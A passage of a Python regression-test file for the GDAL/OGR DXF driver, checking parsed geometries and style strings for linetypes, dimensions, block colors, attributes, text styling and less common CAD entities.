-6.0))') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'POLYGON Z ((98.5006722379985 -24.8076524621295 0,96 -28 0,97.330144807446 -24.1691829545554 0,98.5006722379985 -24.8076524621295 0))') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    f = lyr.GetNextFeature()
    if f.GetStyleString() != 'LABEL(f:"Arial",t:"Splines",p:7,a:342,s:2g,c:#000000)' \
            or ogrtest.check_feature_geometry(f, 'POINT (110.7043505591 -4.20673403616296)') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    # MULTILEADER with DIMBREAK
    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'MULTILINESTRING ((50.8917622404846 41.5635728657296,51.2877903403879 42.2579494192141),(51.9070696740577 43.3437639093041,54.3108962133801 47.5585173269448,55.9270734326513 48.2521008552884),(57.0757636753042 48.7450620367561,59.4256548786735 49.7535194092661),(60 50,60 50),(60 50,60 50),(60.625 50.0,61.875 50.0),(63.125 50.0,63.6 50.0))') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    return 'success'
###############################################################################
# Test linetype scaling (#7129) and parsing of complex linetypes (#7134)

def ogr_dxf_45():
    """Check the linetype name and resulting PEN pattern of four features."""

    ds = ogr.Open('data/linetypes.dxf')
    lyr = ds.GetLayer(0)

    # (expected Linetype field, expected style string), in feature order
    expectations = [
        ('DASHED2', 'PEN(c:#000000,p:"12.5g 6.25g")'),
        ('DASHED2', 'PEN(c:#000000,p:"0.625g 0.3125g")'),
        ('DASHED2_FLIPPED', 'PEN(c:#000000,p:"0.625g 0.3125g")'),
        ('Drain_Pipe_Inv_100', 'PEN(c:#000000,p:"35g 22.5g")'),
    ]

    for index, (linetype, style) in enumerate(expectations, start=1):
        feat = lyr.GetNextFeature()
        if feat.GetField('Linetype') != linetype:
            gdaltest.post_reason( 'Got wrong linetype (%d)' % index )
            return 'fail'
        if feat.GetStyleString() != style:
            print(feat.GetStyleString())
            gdaltest.post_reason( 'Got wrong style string (%d)' % index )
            return 'fail'

    return 'success'
###############################################################################
# Test handling of DIMENSION anonymous block insertion (#7120)

def ogr_dxf_46():
    """Check geometries rendered from a DIMENSION's anonymous block."""

    ds = ogr.Open('data/dimension.dxf')
    lyr = ds.GetLayer(0)

    # Expected geometries, in feature order
    expected_wkts = [
        # Extension lines
        'LINESTRING Z (320000.0 5820010.0625 0,320000.0 5820010.43087258 0)',
        'LINESTRING Z (320010.0 5820010.0625 0,320010.0 5820010.43087258 0)',
        # Dimension arrow lines
        'LINESTRING Z (320000.18 5820010.25087258 0,320004.475225102 5820010.25087258 0)',
        'LINESTRING Z (320009.82 5820010.25087258 0,320005.524774898 5820010.25087258 0)',
        # Arrowheads
        'POLYGON ((320000.18 5820010.28087259,320000.18 5820010.22087258,320000.0 5820010.25087258,320000.18 5820010.28087259))',
        'POLYGON ((320009.82 5820010.28087259,320009.82 5820010.22087258,320010.0 5820010.25087258,320009.82 5820010.28087259))',
        # Text
        'POINT Z (320004.537844475 5820010.16240737 0)',
    ]

    for wkt in expected_wkts:
        feat = lyr.GetNextFeature()
        if ogrtest.check_feature_geometry(feat, wkt) != 0:
            gdaltest.post_reason('fail')
            feat.DumpReadable()
            return 'fail'

    # feat is now the text feature; its label style must come from the block
    if feat.GetStyleString() != 'LABEL(f:"Arial",t:"10.0000",p:1,s:0.18g,c:#000000)':
        gdaltest.post_reason( 'Wrong style string on DIMENSION text from block' )
        feat.DumpReadable()
        return 'fail'

    return 'success'
###############################################################################
# Test handling of DIMENSION fallback when there is no anonymous block (#7120)

def ogr_dxf_47():
    """Check DIMENSION rendering when the driver must synthesize the geometry.

    data/dimension-entities-only.dxf has no anonymous blocks, so the driver
    draws each dimension itself. Three dimensions are checked: one with
    default styling, one with inline style overrides, and one inheriting a
    custom DIMSTYLE.
    """

    ds = ogr.Open('data/dimension-entities-only.dxf')
    lyr = ds.GetLayer(0)

    # Basic DIMENSION inheriting default styling

    # Dimension line and extension lines
    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'MULTILINESTRING ((320010.0 5820010.25087258,320000.0 5820010.25087258),(320010.0 5820010.0625,320010.0 5820010.43087258),(320000.0 5820010.0625,320000.0 5820010.43087258))') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    # Arrowheads
    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'POLYGON Z ((320009.82 5820010.28087259 0,320010.0 5820010.25087258 0,320009.82 5820010.22087258 0,320009.82 5820010.28087259 0))') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'POLYGON Z ((320000.18 5820010.22087258 0,320000.0 5820010.25087258 0,320000.18 5820010.28087259 0,320000.18 5820010.22087258 0))') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    # Text
    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'POINT (320005.0 5820010.25087258)') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'
    if f.GetStyleString() != 'LABEL(f:"Arial",t:"10.0000",p:11,s:0.18g,c:#000000)':
        gdaltest.post_reason( 'Wrong style string on first DIMENSION text' )
        f.DumpReadable()
        return 'fail'

    # DIMENSION with style overrides

    # Dimension line
    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'MULTILINESTRING ((320005 5820005,320000 5820010))') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    # Arrowheads
    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'POLYGON Z ((320004.116116524 5820006.23743687 0,320005 5820005 0,320003.762563133 5820005.88388348 0,320004.116116524 5820006.23743687 0))') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'POLYGON Z ((320000.883883476 5820008.76256313 0,320000 5820010 0,320001.237436867 5820009.11611652 0,320000.883883476 5820008.76256313 0))') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    # Text
    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'POINT (320002.5 5820007.5)') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'
    if f.GetStyleString() != 'LABEL(f:"Arial",t:"7.1",p:11,a:-45,s:0.48g,c:#000000)':
        gdaltest.post_reason( 'Wrong style string on second DIMENSION text' )
        f.DumpReadable()
        return 'fail'

    # DIMENSION inheriting styles from a custom DIMSTYLE

    # Dimension line
    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'MULTILINESTRING ((320000.0 5820001.5,320005.0 5820001.5),(320000.0 5820002.4,320000 5820001),(320005.0 5820002.4,320005 5820001))') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    # Arrowheads
    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'POLYGON Z ((320000.18 5820001.47 0,320000.0 5820001.5 0,320000.18 5820001.53 0,320000.18 5820001.47 0))') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'POLYGON Z ((320004.82 5820001.53 0,320005.0 5820001.5 0,320004.82 5820001.47 0,320004.82 5820001.53 0))') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    # Text (the label includes a literal plus-minus sign and a line break)
    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'POINT (320001.5 5820001.5)') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'
    if f.GetStyleString() != 'LABEL(f:"Arial",t:"±2 3\n\\P4 5.0000",p:11,s:0.18g,c:#000000)':
        gdaltest.post_reason( 'Wrong style string on third DIMENSION text' )
        f.DumpReadable()
        return 'fail'

    return 'success'
###############################################################################
# Test ByLayer and ByBlock color values (#7130)

def ogr_dxf_48():
    """Check resolved colors for ByLayer/ByBlock styling with merging off."""

    gdal.SetConfigOption('DXF_MERGE_BLOCK_GEOMETRIES', 'FALSE')
    ds = ogr.Open('data/byblock-bylayer.dxf')
    gdal.SetConfigOption('DXF_MERGE_BLOCK_GEOMETRIES', None)

    lyr = ds.GetLayer(0)

    # (feature id, expected style string) pairs.
    style_checks = [
        # First insert an anonymous dimension block (this is NOT a test of our
        # basic "dimension" renderer)

        # The dimension extension lines are ByBlock; the INSERT is magenta
        (0, 'PEN(c:#ff00ff,p:"1.5875g 1.5875g")'),
        # The dimension line is set directly to blue
        (2, 'PEN(c:#0000ff)'),
        # The first arrowhead is a custom block; the SOLID in this block is
        # colored ByLayer; the layer the block is inserted on (_K_POINTS)
        # is colored red
        (4, 'BRUSH(fc:#ff0000)'),
        # The first arrowhead block also contains a line colored ByBlock.
        # The arrowhead INSERT is blue, so the line should be blue.
        # Because this INSERT is within another block, we need to make
        # sure the ByBlock colouring isn't handled again for the outer
        # block, which is magenta.
        (5, 'PEN(c:#0000ff)'),
        # The second arrowhead, like the dimension line, is set directly
        # to blue
        (6, 'BRUSH(fc:#0000ff)'),
        # Like the dimension extension lines, the text is ByBlock (#7099)
        (7, 'LABEL(f:"Arial",t:"10.141 (2C)",s:0.4g,p:5,c:#ff00ff)'),
        # ByLayer feature in block
        (11, 'PEN(c:#ff0000)'),
        # ByBlock feature in block
        (12, 'PEN(c:#a552a5)'),
        # ByLayer feature inserted via an INSERT on yellow layer in block
        # inserted via an INSERT on red layer: should be yellow
        (13, 'PEN(c:#ffff00)'),
        # ByBlock feature inserted via a ByBlock INSERT in block inserted
        # via a color213 INSERT: should be color213
        (14, 'PEN(c:#a552a5)'),
        # ByBlock entities directly on the canvas show up as black
        (15, 'PEN(c:#000000)'),
    ]

    for fid, style in style_checks:
        feat = lyr.GetFeature(fid)
        if feat.GetStyleString() != style:
            gdaltest.post_reason( 'Wrong style string on feature %d' % fid )
            feat.DumpReadable()
            return 'fail'

    return 'success'
###############################################################################
# Test block attributes (ATTRIB entities) (#7139)

def ogr_dxf_49():
    """Check ATTRIB/ATTDEF handling with and without block inlining."""

    # Inline blocks mode
    ds = ogr.Open('data/attrib.dxf')
    lyr = ds.GetLayer(0)

    if lyr.GetFeatureCount() != 6:
        gdaltest.post_reason( 'Wrong feature count, got %d' % lyr.GetFeatureCount() )
        return 'fail'

    feat = lyr.GetFeature(1)
    if feat.GetField('Text') != 'super test':
        gdaltest.post_reason( 'Wrong Text value on first ATTRIB on first INSERT' )
        feat.DumpReadable()
        return 'fail'
    if feat.GetStyleString() != 'LABEL(f:"Arial",t:"super test",p:2,s:8g,w:234.6,dx:30.293g,c:#ff0000)':
        gdaltest.post_reason( 'Wrong style string on first ATTRIB on first INSERT' )
        feat.DumpReadable()
        return 'fail'

    feat = lyr.GetFeature(4)
    if feat.GetGeometryRef().GetGeometryType() != ogr.wkbLineString25D:
        gdaltest.post_reason( 'Expected LINESTRING Z' )
        return 'fail'

    feat = lyr.GetFeature(5)
    if feat.GetField('Text') != '':
        gdaltest.post_reason( 'Wrong Text value on ATTRIB on second INSERT' )
        feat.DumpReadable()
        return 'fail'

    # No inlining
    gdal.SetConfigOption('DXF_INLINE_BLOCKS', 'FALSE')
    ds = ogr.Open('data/attrib.dxf')
    gdal.SetConfigOption('DXF_INLINE_BLOCKS', None)

    lyr = ds.GetLayerByName('entities')

    feat = lyr.GetFeature(0)
    if feat.GetField('BlockAttributes') != ['MYATT1 super test','MYATTMULTI_001 Corps','MYATTMULTI_002 plpl']:
        gdaltest.post_reason( 'Wrong BlockAttributes value on first INSERT' )
        feat.DumpReadable()
        return 'fail'

    feat = lyr.GetFeature(1)
    if feat.GetField('BlockAttributes') != ['MYATTMULTI ']:
        gdaltest.post_reason( 'Wrong BlockAttributes value on second INSERT' )
        feat.DumpReadable()
        return 'fail'

    lyr = ds.GetLayerByName('blocks')

    feat = lyr.GetFeature(1)
    if feat.GetField('AttributeTag') != 'MYATT1':
        gdaltest.post_reason( 'Wrong AttributeTag value on first ATTDEF' )
        feat.DumpReadable()
        return 'fail'

    feat = lyr.GetFeature(2)
    if feat.GetField('AttributeTag') != 'MYATTMULTI':
        gdaltest.post_reason( 'Wrong AttributeTag value on second ATTDEF' )
        feat.DumpReadable()
        return 'fail'

    return 'success'
###############################################################################
# Test extended text styling (#7151) and additional ByBlock/ByLayer tests (#7130)

def ogr_dxf_50():
    """Check style strings for fancy text and ByBlock/ByLayer inheritance."""

    gdal.SetConfigOption('DXF_MERGE_BLOCK_GEOMETRIES', 'FALSE')
    ds = ogr.Open('data/text-fancy.dxf')
    gdal.SetConfigOption('DXF_MERGE_BLOCK_GEOMETRIES', None)

    lyr = ds.GetLayer(0)

    # (feature id, expected style string) pairs
    style_checks = [
        # Text in Times New Roman bold italic, stretched 190%, color ByLayer
        # inside block inserted on a blue layer
        (0, 'LABEL(f:"Times New Roman",bo:1,it:1,t:"Some nice text",p:5,s:10g,w:190,dx:84.3151g,dy:4.88825g,c:#0000ff)'),
        # Polyline, color and linetype ByBlock inside block with red color
        # and ByLayer linetype inserted on a layer with DASHED2 linetype
        (1, 'PEN(c:#ff0000,w:2.1g,p:"2.5g 1.25g")'),
        # Make sure TEXT objects don't inherit anything other than font name,
        # bold and italic from their parent STYLE
        (2, 'LABEL(f:"Times New Roman",bo:1,it:1,t:"Good text",p:1,s:5g,c:#000000)'),
        # Polyline, color ByBlock, inside block inserted on a blue layer
        (3, 'PEN(c:#0000ff,w:2.1g)'),
        # MTEXT stretched 250%, color ByLayer inside block inserted on a blue layer
        (4, 'LABEL(f:"Times New Roman",bo:1,it:1,t:"Some nice MTEXT",s:10g,w:250,p:8,c:#0000ff)'),
        # Individually invisible object should be invisible
        (5, 'LABEL(f:"Times New Roman",bo:1,it:1,t:"Invisible text",p:1,s:5g,c:#00000000)'),
    ]

    for fid, style in style_checks:
        feat = lyr.GetFeature(fid)
        if feat.GetStyleString() != style:
            gdaltest.post_reason( 'Wrong style string on feature %d' % fid )
            feat.DumpReadable()
            return 'fail'

    return 'success'
###############################################################################
# Test transformation of text inside blocks (ACAdjustText function)
def ogr_dxf_51():
    """Verify the ACAdjustText transformation for text inside blocks: all
    three text features must resolve to the same effective geometry and
    the same (order-insensitive) set of style tokens.

    Returns 'success' or 'fail' (gdaltest-style test function).
    """
    ds = ogr.Open('data/text-block-transform.dxf')
    lyr = ds.GetLayer(0)
    expected_style_tokens = [
        'a:330', 'c:#000000', 'dx:1.96672g', 'dy:-1.13549g', 'f:"Arial"',
        'p:2', 's:3g', 't:"some text"', 'w:25']
    # Three text features, all with the same effective geometry and style
    for feature_index in range(3):
        feat = lyr.GetNextFeature()
        if ogrtest.check_feature_geometry(
                feat, 'POINT Z (2.83231568033604 5.98356393304499 0)') != 0:
            gdaltest.post_reason( 'Wrong geometry on feature %d' % feature_index )
            feat.DumpReadable()
            return 'fail'
        # Strip the leading 'LABEL(' and trailing ')' from the style string,
        # then compare the comma-separated tokens ignoring their order.
        actual_tokens = sorted(feat.GetStyleString()[6:-1].split(','))
        if actual_tokens != expected_style_tokens:
            gdaltest.post_reason( 'Wrong style string on feature %d' % feature_index )
            feat.DumpReadable()
            return 'fail'
    return 'success'
###############################################################################
# Test HELIX, TRACE, HATCH with spline boundary, MLINE, and INSERT with rows/columns
def ogr_dxf_52():
    """Read data/additional-entities.dxf and check the translation of the
    less common DXF entity types: HELIX, TRACE, HATCH with a spline
    boundary path, MLINE, INSERT with rows/columns (MInsert), and a
    SPLINE whose knot vector does not start at zero.

    Returns 'success' or 'fail' (gdaltest-style test function).
    """
    ds = ogr.Open('data/additional-entities.dxf')
    lyr = ds.GetLayer(0)
    # HELIX — reported through the spline subclass chain.
    f = lyr.GetNextFeature()
    if f.GetField('SubClasses') != 'AcDbEntity:AcDbSpline:AcDbHelix':
        gdaltest.post_reason( 'Wrong SubClasses on HELIX' )
        f.DumpReadable()
        return 'fail'
    # The helix curve is approximated by a densified linestring.
    if ogrtest.check_feature_geometry(f, 'LINESTRING (150 120,149.345876458438 119.778561209114,148.706627788813 119.535836602547,148.082773142501 119.272634882071,147.474831670876 118.989764749454,146.883322525316 118.688034906466,146.308764857195 118.368254054878,145.75167781789 118.03123089646,145.212580558776 117.677774132981,144.691992231228 117.308692466212,144.190431986623 116.924794597921,143.708418976337 116.52688922988,143.246472351745 116.115785063858,142.805226682224 115.692350328976,142.385468357145 115.257680939095,141.987209053809 114.8126724387,141.610382578047 114.358190780749,141.254922735687 113.895101918197,140.920763332559 113.424271804003,140.607838174492 112.946566391121,140.316081067316 112.46285163251,140.04542581686 111.973993481125,139.795806228954 111.480857889924,139.567156109426 110.984310811863,139.359409264107 110.4852181999,139.172499498825 109.98444600699,139.00636061941 109.482860186091,138.860926431692 108.981326690159,138.7361307415 108.480711472151,138.631907354662 107.981880485024,138.54819007701 107.485699681734,138.484912714371 106.993035015239,138.442009072576 106.504752438495,138.419412957453 106.021717904458,138.41678542913 105.544991394258,138.433333223564 105.075482938615,138.468434844937 104.613670677827,138.521471087835 104.160029888371,138.59182274684 103.715035846723,138.678870616536 103.27916382936,138.781995491508 102.852889112758,138.900578166339 102.436686973394,139.033999435614 102.031032687745,139.181640093916 101.636401532287,139.342880935829 101.253268783496,139.517102755937 100.882109717849,139.703686348824 100.523399611823,139.902012509075 100.177613741895,140.111462031272 99.8452273845396,140.33141571 99.5267158162348,140.561254339843 99.2225543134567,140.800358715385 98.933218152682,141.04810963121 98.6591826103871,141.303887881901 98.4009229630486,141.567055122443 98.1589144355755,141.836465751876 97.9334729764931,142.111203876514 97.7245055448538,142.390570491032 97.5318567084626,142.673866590107 97.3553710351246,142.960393168413 97.194893092645,143.249451220625 97.0502674488286,143.54034174142 96.9213386714808,143.832365725473 96.8079513284064,144.124824167458 96.7099499874106,144.417018062052 96.6271792162984,144.708248403929 96.5594835828749,144.997816187765 96.5067076549452,145.285022408236 96.4686960003143,145.569168060017 96.4452931867873,145.849554137782 96.4363437821692,146.125481636209 96.4416923542652,146.396251549971 96.4611834708803,146.661164873745 96.4946616998195,146.919522602205 96.5419716088879,147.170625730027 96.6029577658907,147.413708536343 96.6773765373194,147.64790100184 96.7644518356677,147.872845806317 96.8635266377703,148.088244263586 96.9739879715066,148.293797687463 97.0952228647559,148.48920739176 97.2266183453974,148.674174690292 97.3675614413103,148.848400896871 97.5174391803741,149.011587325312 97.675638590468,149.163435289429 97.8415466994713,149.303646103034 98.0145505352631,149.431921079943 98.194037125723,149.547961533967 98.37939349873,149.651468778922 98.5700066821635,149.742144128621 98.7652637039028,149.819688896877 98.9645515918272,149.883804397505 99.1672573738159,149.934191944317 99.3727680777483,149.970552851128 99.5804707315036,149.992588431751 99.7897523629611,150 100)') != 0:
        gdaltest.post_reason( 'Wrong geometry on HELIX' )
        f.DumpReadable()
        return 'fail'
    # TRACE — translated as a filled quadrilateral polygon.
    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'POLYGON ((150.0 120.5,150.0 119.5,200.0 119.5,200.0 120.5,150.0 120.5))') != 0:
        gdaltest.post_reason( 'Wrong geometry on TRACE' )
        f.DumpReadable()
        return 'fail'
    # HATCH with a spline boundary path (and OCS as well, just for fun)
    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'POLYGON Z ((47.6969600708475 60.0 15,47.6969600708475 0.0 15,46.1103652823066 -0.466958240734954 14.5010390223444,44.5309994192688 -0.919910449553494 14.0043514365868,42.9660914072371 -1.34485059453921 13.5122106346236,41.4228701717145 -1.72777264377568 13.0268900083519,39.9085646382042 -2.0546705653465 12.5506629496691,38.4304037322091 -2.31153832733525 12.0858028504722,36.9956163792324 -2.48436989782552 11.6345831026584,35.6114315047771 -2.55915924490089 11.1992770981251,34.2850780343463 -2.52190033664495 10.7821582287693,33.0237848934429 -2.3585871411413 10.3854998864882,31.8347810075701 -2.0552136264735 10.011575463179,30.725295302231 -1.59777376072516 9.66265835073903,29.7025567029285 -0.972261511979859 9.34102194106535,28.7737941351658 -0.164670848321179 9.04893962605519,27.9445456607789 0.835923776643351 8.78815304558283,27.2086691364137 2.01916842728349 8.55673058492536,26.5550905172208 3.36572402537053 8.35118961809371,25.9727183005027 4.85621968724478 8.1680420288596,25.450460983562 6.47128452924656 8.00379970099481,24.9772270637013 8.19154766771616 7.85497451827107,24.5419250382231 9.99763821899391 7.71807836446012,24.1334634044299 11.8701852994201 7.58962312333373,23.7407506596245 13.7898180253351 7.46612067866363,23.3526953011092 15.7371655130791 7.34408291422158,22.9582058261868 17.6928568789925 7.22002171377933,22.5461907321598 19.6375212394157 7.09044896110861,22.1055585163308 21.5517877106888 6.95187653998118,21.6252176760022 23.4162854091522 6.80081633416879,21.0940767084768 25.2116434511463 6.63378022744318,20.501044111057 26.9184909530113 6.44728010357611,19.8350283810455 28.5174570310876 6.23782784633932,19.0849380157448 29.9891708017154 6.00193533950455,18.2425220975445 31.3190096857923 5.73700778952582,17.3111586046656 32.5117898949509 5.44410752140743,16.2972009340528 33.5773013324584 5.12523258605305,15.2070024839932 34.5253339038266 4.7823810347885,14.046916652774 35.3656775145671 4.41755091893963,12.8232968386826 36.1081220701913 4.0327402898323,11.5424964400062 36.7624574762111 3.62994719879235,10.2108688550319 37.338473638138 3.21116969714562,8.834767482047 37.8459604614835 2.77840583621797,7.42054571933875 38.2947078517594 2.33365366733523,5.97455696519436 38.6945057144772 1.87891124182326,4.50315461790106 39.0551439551486 1.41617661100791,3.01269207574607 39.3864124792851 0.947447826215011,1.50952273701662 39.6981011923983 0.474722938770421,0 40 0,-0.0 40.0 -2.12999999999989e-15,47.6969600708475 60.0 15))') != 0:
        gdaltest.post_reason( 'Wrong geometry on HATCH' )
        f.DumpReadable()
        return 'fail'
    # Three MLINE objects
    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'MULTILINESTRING Z ((-3.92232270276368 270.388386486182 0,44.2014737139232 260.763627202844 0),(0 290 0,50 280 0),(50 280 0,54.2440667916678 280.848813358334 0),(66.6666666666666 283.333333333333 0,87.2937093466817 287.458741869336 0),(55.335512192016 260.671024384032 0,83.0445264186877 266.212827229366 0),(97.9166666666667 289.583333333333 0,150 300 0),(93.6674837386727 268.337418693363 0,122.93205511402 274.190332968433 0),(150 300 0,140 260 0),(122.93205511402 274.190332968433 0,120.597149997093 264.850712500727 0))') != 0:
        gdaltest.post_reason( 'Wrong geometry on MLINE 1' )
        f.DumpReadable()
        return 'fail'
    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'MULTILINESTRING Z ((70 290 0,50 250 0),(61.0557280900008 294.472135955 0,41.0557280900008 254.472135955 0))') != 0:
        gdaltest.post_reason( 'Wrong geometry on MLINE 2' )
        f.DumpReadable()
        return 'fail'
    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'MULTILINESTRING Z ((100 300 0,97.9166666666667 289.583333333333 0),(95.7739043877141 304.364619506534 0,92.6051880066742 288.521037601335 0),(91.5478087754281 308.729239013068 0,87.2937093466817 287.458741869336 0),(93.6674837386727 268.337418693363 0,90 250 0),(88.3560050786802 267.275122961365 0,83.7111464107331 244.050829621629 0),(83.0445264186877 266.212827229366 0,77.4222928214662 238.101659243259 0),(90 250 0,160 260 0),(83.7111464107331 244.050829621629 0,165.0 255.663522991525 0),(77.4222928214662 238.101659243259 0,170.0 251.327045983049 0),(160 260 0,160 310 0),(165.0 255.663522991525 0,165.0 315.902302108582 0),(170.0 251.327045983049 0,170.0 321.804604217164 0),(160 310 0,100 300 0),(165.0 315.902302108582 0,95.7739043877141 304.364619506534 0),(170.0 321.804604217164 0,91.5478087754281 308.729239013068 0))') != 0:
        gdaltest.post_reason( 'Wrong geometry on MLINE 3' )
        f.DumpReadable()
        return 'fail'
    # INSERT with rows/columns (MInsert)
    # Every attribute of the repeated insert carries the same style string.
    minsert_attrib_style = 'LABEL(f:"Arial",t:"N",p:5,a:13,s:8g,w:120,dx:2.21818g,dy:4.61732g,c:#000000)'
    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'LINESTRING (57.7504894565613 50.7437006478524,69.4429302339842 53.4431132999787,71.6924407774228 43.6994126521264,60 41,57.7504894565613 50.7437006478524)') != 0:
        gdaltest.post_reason( 'Wrong geometry on INSERT polyline 1' )
        f.DumpReadable()
        return 'fail'
    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'POINT Z (62.5032851270548 42.604233016948 0)') != 0 \
            or f.GetStyleString() != minsert_attrib_style:
        gdaltest.post_reason( 'Wrong geometry on INSERT attribute 1' )
        f.DumpReadable()
        return 'fail'
    # Skip insert copy 2 (polyline + attribute), then spot-check copy 3.
    for x in range(2):
        f = lyr.GetNextFeature()
    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'LINESTRING (116.212693343675 64.2407639084843,127.905134121098 66.9401765606106,130.154644664537 57.1964759127583,118.462203887114 54.4970632606319,116.212693343675 64.2407639084843)') != 0:
        gdaltest.post_reason( 'Wrong geometry on INSERT polyline 3' )
        f.DumpReadable()
        return 'fail'
    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'POINT Z (120.965489014169 56.1012962775799 0)') != 0 \
            or f.GetStyleString() != minsert_attrib_style:
        gdaltest.post_reason( 'Wrong geometry on INSERT attribute 3' )
        f.DumpReadable()
        return 'fail'
    # Skip copies 4-7 (four polyline/attribute pairs), then check copy 8.
    for x in range(8):
        f = lyr.GetNextFeature()
    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'LINESTRING (140.944774200355 90.4766968345049,152.637214977778 93.1761094866313,154.886725521217 83.4324088387789,143.194284743794 80.7329961866526,140.944774200355 90.4766968345049)') != 0:
        gdaltest.post_reason( 'Wrong geometry on INSERT polyline 8' )
        f.DumpReadable()
        return 'fail'
    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'POINT Z (145.697569870849 82.3372292036006 0)') != 0 \
            or f.GetStyleString() != minsert_attrib_style:
        gdaltest.post_reason( 'Wrong geometry on INSERT attribute 8' )
        f.DumpReadable()
        return 'fail'
    # Also throw in a test of a weird SPLINE generated by a certain CAD package
    # with a knot vector that does not start at zero
    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'LINESTRING (0 20,0.513272464826192 19.8251653183892,1.00815682586353 19.629626397244,1.48499546839613 19.4132825350102,1.94413077770813 19.1760330301337,2.38590513908363 18.9177771810603,2.81066093780676 18.6384142862359,3.21874055916165 18.3378436441062,3.61048638843241 18.0159645531172,3.98624081090316 17.6726763117148,4.34634621185803 17.3078782183446,4.69114497658114 16.9214695714527,5.02097949035661 16.5133496694848,5.33619213846856 16.0834178108867,5.63712530620111 15.6315732941045,5.92412137883838 15.1577154175837,6.1975227416645 14.6617434797705,6.45767177996359 14.1435567791104,6.70491087901976 13.6030546140496,6.93958242411715 13.0401362830336,7.16202880053986 12.4547010845085,7.37259239357203 11.8466483169201,7.57161558849776 11.2158772787141,7.7594407706012 10.5622872683365,7.93641032516645 9.88577758423314,8.10286663747763 9.18624752484979,8.25915209281888 8.46359638863234,8.4056090764743 7.71772347402662,8.54257997372803 6.94852807947849,8.67040716986418 6.1559095034338,8.78943305016688 5.33976704433838,8.9 4.5)') != 0:
        gdaltest.post_reason( 'Wrong geometry on SPLINE' )
        f.DumpReadable()
        return 'fail'
    return 'success'
###############################################################################
# Test block base points
def ogr_dxf_53():
    """Check that block base points are honoured when a block is inserted.

    Returns 'success' or 'fail' (gdaltest-style test function).
    """
    ds = ogr.Open('data/block-basepoint.dxf')
    feat = ds.GetLayer(0).GetNextFeature()
    expected_wkt = 'MULTILINESTRING Z ((290 160 0,310 140 0),(310 160 0,290 140 0))'
    if ogrtest.check_feature_geometry(feat, expected_wkt) == 0:
        return 'success'
    gdaltest.post_reason( 'Wrong feature geometry' )
    feat.DumpReadable()
    return 'fail'
###############################################################################
# cleanup
def ogr_dxf_cleanup():
    """Drop the module-level DXF layer/datasource references held on gdaltest
    so the underlying handles can be released.
    """
    # Clear the layer first, then the datasource that owns it.
    for attr in ('dxf_layer', 'dxf_ds'):
        setattr(gdaltest, attr, None)
    return 'success'
###############################################################################
#
# Ordered list of test callables consumed by gdaltest.run_tests();
# ogr_dxf_cleanup comes last so shared module state is released at the end.
gdaltest_list = [
    ogr_dxf_1,
    ogr_dxf_2,
    ogr_dxf_3,
    ogr_dxf_4,
    ogr_dxf_5,
    ogr_dxf_6,
    ogr_dxf_7,
    ogr_dxf_8,
    ogr_dxf_9,
    ogr_dxf_10,
    ogr_dxf_11,
    ogr_dxf_12,
    ogr_dxf_13,
    ogr_dxf_14,
    ogr_dxf_15,
    ogr_dxf_16,
    ogr_dxf_17,
    ogr_dxf_18,
    ogr_dxf_19,
    ogr_dxf_20,
    ogr_dxf_21,
    ogr_dxf_22,
    ogr_dxf_23,
    ogr_dxf_24,
    ogr_dxf_25,
    ogr_dxf_26,
    ogr_dxf_27,
    ogr_dxf_28,
    ogr_dxf_29,
    ogr_dxf_30,
    ogr_dxf_31,
    ogr_dxf_32,
    ogr_dxf_33,
    ogr_dxf_34,
    ogr_dxf_35,
    ogr_dxf_36,
    ogr_dxf_37,
    ogr_dxf_38,
    ogr_dxf_39,
    ogr_dxf_40,
    ogr_dxf_41,
    ogr_dxf_42,
    ogr_dxf_43,
    ogr_dxf_44,
    ogr_dxf_45,
    ogr_dxf_46,
    ogr_dxf_47,
